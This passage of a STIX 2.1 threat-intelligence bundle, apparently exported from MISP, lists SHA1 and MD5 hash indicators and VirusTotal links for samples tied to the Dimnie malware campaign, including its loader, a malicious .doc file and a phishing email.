"first_observed": "2017-03-29T09:48:35Z",
|
|
"last_observed": "2017-03-29T09:48:35Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82f3-f4e8-4f66-a17d-483d02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82f3-f4e8-4f66-a17d-483d02de0b81",
|
|
"value": "https://www.virustotal.com/file/1b5e57fa264b2ce145b39f9fc2279b21f6b212aeca8eaa27f68cdcdbdef1900f/analysis/1458620659/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82f4-4c68-486f-81df-48d202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:36.000Z",
|
|
"modified": "2017-03-29T09:48:36.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 046bc7347a66c977a89ba693307f881b0c3568314bb7ffd952c8705a2ff9bf9d",
|
|
"pattern": "[file:hashes.SHA1 = '63153826769a529b2ff84855f575a3cb82c31430']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:36Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82f5-e9b4-4649-adcc-44a602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:37.000Z",
|
|
"modified": "2017-03-29T09:48:37.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 046bc7347a66c977a89ba693307f881b0c3568314bb7ffd952c8705a2ff9bf9d",
|
|
"pattern": "[file:hashes.MD5 = 'ac136a2bb13101e4443f9f86b3abea2b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82f6-99d4-42d8-b248-4e7502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:38.000Z",
|
|
"modified": "2017-03-29T09:48:38.000Z",
|
|
"first_observed": "2017-03-29T09:48:38Z",
|
|
"last_observed": "2017-03-29T09:48:38Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82f6-99d4-42d8-b248-4e7502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82f6-99d4-42d8-b248-4e7502de0b81",
|
|
"value": "https://www.virustotal.com/file/046bc7347a66c977a89ba693307f881b0c3568314bb7ffd952c8705a2ff9bf9d/analysis/1461076901/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82f6-1054-4519-8499-428402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:38.000Z",
|
|
"modified": "2017-03-29T09:48:38.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 7d8ec31d9d98802e9b1ebc49c4b300fa901934b3d2d602fa36cc5d7c5d24b3bc",
|
|
"pattern": "[file:hashes.SHA1 = '6aafdc444ae59604bab0b536d76649ff8f43b4c8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:38Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82f7-30fc-4a4a-9406-479a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:39.000Z",
|
|
"modified": "2017-03-29T09:48:39.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 7d8ec31d9d98802e9b1ebc49c4b300fa901934b3d2d602fa36cc5d7c5d24b3bc",
|
|
"pattern": "[file:hashes.MD5 = '432efd65ccffbca51946a8e86e131a23']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:39Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82f8-21ec-4540-b684-46f502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:40.000Z",
|
|
"modified": "2017-03-29T09:48:40.000Z",
|
|
"first_observed": "2017-03-29T09:48:40Z",
|
|
"last_observed": "2017-03-29T09:48:40Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82f8-21ec-4540-b684-46f502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82f8-21ec-4540-b684-46f502de0b81",
|
|
"value": "https://www.virustotal.com/file/7d8ec31d9d98802e9b1ebc49c4b300fa901934b3d2d602fa36cc5d7c5d24b3bc/analysis/1467418566/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82f9-2708-4f4f-a81e-406a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:41.000Z",
|
|
"modified": "2017-03-29T09:48:41.000Z",
|
|
"description": "Sample decrypted main module - Xchecked via VT: 6173d2f1d7bdea5f6fe199d39bbefa575230c5a6c52b08925ff4693106518adf",
|
|
"pattern": "[file:hashes.SHA1 = '7d4142b171e86f5d5a9e0144795314f91efc7d4b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82fa-7a68-4551-a035-4de402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:42.000Z",
|
|
"modified": "2017-03-29T09:48:42.000Z",
|
|
"description": "Sample decrypted main module - Xchecked via VT: 6173d2f1d7bdea5f6fe199d39bbefa575230c5a6c52b08925ff4693106518adf",
|
|
"pattern": "[file:hashes.MD5 = '8e7e3d612489cb37acfb3526647e11c8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:42Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82fb-f1fc-449c-9354-402a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:43.000Z",
|
|
"modified": "2017-03-29T09:48:43.000Z",
|
|
"first_observed": "2017-03-29T09:48:43Z",
|
|
"last_observed": "2017-03-29T09:48:43Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82fb-f1fc-449c-9354-402a02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82fb-f1fc-449c-9354-402a02de0b81",
|
|
"value": "https://www.virustotal.com/file/6173d2f1d7bdea5f6fe199d39bbefa575230c5a6c52b08925ff4693106518adf/analysis/1490772669/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82fc-2810-43fa-831a-435e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:44.000Z",
|
|
"modified": "2017-03-29T09:48:44.000Z",
|
|
"description": "Dimnie loader - Xchecked via VT: 3f73b09d9cdd100929061d8590ef0bc01b47999f47fa024f57c28dcd660e7c22",
|
|
"pattern": "[file:hashes.SHA1 = '0df45a365e2135531b0beba8e50d0453eee70047']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:44Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82fd-166c-4cb7-ab48-449302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:45.000Z",
|
|
"modified": "2017-03-29T09:48:45.000Z",
|
|
"description": "Dimnie loader - Xchecked via VT: 3f73b09d9cdd100929061d8590ef0bc01b47999f47fa024f57c28dcd660e7c22",
|
|
"pattern": "[file:hashes.MD5 = 'b5126b18814413fe10ab6fa5f9bcf692']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:45Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82fe-ada0-4e58-a871-4ee002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:46.000Z",
|
|
"modified": "2017-03-29T09:48:46.000Z",
|
|
"first_observed": "2017-03-29T09:48:46Z",
|
|
"last_observed": "2017-03-29T09:48:46Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82fe-ada0-4e58-a871-4ee002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82fe-ada0-4e58-a871-4ee002de0b81",
|
|
"value": "https://www.virustotal.com/file/3f73b09d9cdd100929061d8590ef0bc01b47999f47fa024f57c28dcd660e7c22/analysis/1488500045/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82fe-a0a8-43af-8d4a-4bdc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:46.000Z",
|
|
"modified": "2017-03-29T09:48:46.000Z",
|
|
"description": "Malicious .doc file - Xchecked via VT: 6b9af3290723f081e090cd29113c8755696dca88f06d072dd75bf5560ca9408e",
|
|
"pattern": "[file:hashes.SHA1 = '80ac1d4ae82a4f9a3f0068c79b96483fb7a7c16d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:46Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82ff-62a4-49d8-9553-4ac302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:47.000Z",
|
|
"modified": "2017-03-29T09:48:47.000Z",
|
|
"description": "Malicious .doc file - Xchecked via VT: 6b9af3290723f081e090cd29113c8755696dca88f06d072dd75bf5560ca9408e",
|
|
"pattern": "[file:hashes.MD5 = '2fecbe8848bac4001b692f63b33354d3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8300-5d18-4cff-8ad1-426302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:48.000Z",
|
|
"modified": "2017-03-29T09:48:48.000Z",
|
|
"first_observed": "2017-03-29T09:48:48Z",
|
|
"last_observed": "2017-03-29T09:48:48Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8300-5d18-4cff-8ad1-426302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8300-5d18-4cff-8ad1-426302de0b81",
|
|
"value": "https://www.virustotal.com/file/6b9af3290723f081e090cd29113c8755696dca88f06d072dd75bf5560ca9408e/analysis/1489120562/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8301-028c-420d-b737-450202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:49.000Z",
|
|
"modified": "2017-03-29T09:48:49.000Z",
|
|
"description": "Initial Phishing Email - Xchecked via VT: b70a17d21ec6552e884f01db47b4e0aa08776a6542883d144b9836d5c9912065",
|
|
"pattern": "[file:hashes.SHA1 = '9fa5055c5747384fd2b4a32e0b4a236153fbb1d7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:49Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8302-14e4-4651-bbaf-49d002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:50.000Z",
|
|
"modified": "2017-03-29T09:48:50.000Z",
|
|
"description": "Initial Phishing Email - Xchecked via VT: b70a17d21ec6552e884f01db47b4e0aa08776a6542883d144b9836d5c9912065",
|
|
"pattern": "[file:hashes.MD5 = '9edb886cf156ed0a96bb2dec6c883d71']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:50Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8303-7c04-4385-9ed8-457302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:51.000Z",
|
|
"modified": "2017-03-29T09:48:51.000Z",
|
|
"first_observed": "2017-03-29T09:48:51Z",
|
|
"last_observed": "2017-03-29T09:48:51Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8303-7c04-4385-9ed8-457302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8303-7c04-4385-9ed8-457302de0b81",
|
|
"value": "https://www.virustotal.com/file/b70a17d21ec6552e884f01db47b4e0aa08776a6542883d144b9836d5c9912065/analysis/1490778287/"
|
|
},
|
|
{
|
|
"type": "marking-definition",
|
|
"spec_version": "2.1",
|
|
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
|
|
"created": "2017-01-20T00:00:00.000Z",
|
|
"definition_type": "tlp",
|
|
"name": "TLP:WHITE",
|
|
"definition": {
|
|
"tlp": "white"
|
|
}
|
|
}
|
|
]
|
|
} |